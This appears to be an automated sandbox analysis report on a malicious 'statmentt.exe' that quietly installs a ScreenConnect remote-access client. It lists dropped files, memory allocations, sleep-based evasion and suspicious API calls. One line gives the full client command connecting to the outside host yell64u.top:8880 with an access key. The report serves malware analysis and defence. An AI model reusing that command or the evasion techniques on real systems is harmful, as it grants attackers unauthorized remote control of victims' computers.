                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 17F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 3250000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 1830000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 6960000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 60F0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 7960000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 8960000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 6960000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 8BE0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: 9BE0000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 1860000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 1A90000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 1860000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 660000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1A440000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1400000 memory reserve | memory write watchJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1B270000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF488.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF739.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                              Source: C:\Users\user\Desktop\statmentt.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 7840Thread sleep count: 40 > 30Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 8036Thread sleep time: -922337203685477s >= -30000sJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeLast function: Thread delayed
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: setup.msi.0.drBinary or memory string: VMCi-
                              Source: ScreenConnect.ClientService.exe, 00000007.00000002.3053324699.0000000004F24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: 0.2.statmentt.exe.5880000.2.raw.unpack, NativeLibrary.csReference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                              Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                              Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                              Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                              Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                              Source: 0.0.statmentt.exe.11078f8.5.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                              Source: C:\Users\user\Desktop\statmentt.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"Jump to behavior
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=it&c=&c=&c=it%20team&c=&c=&c=&c="
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Progman
                              Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
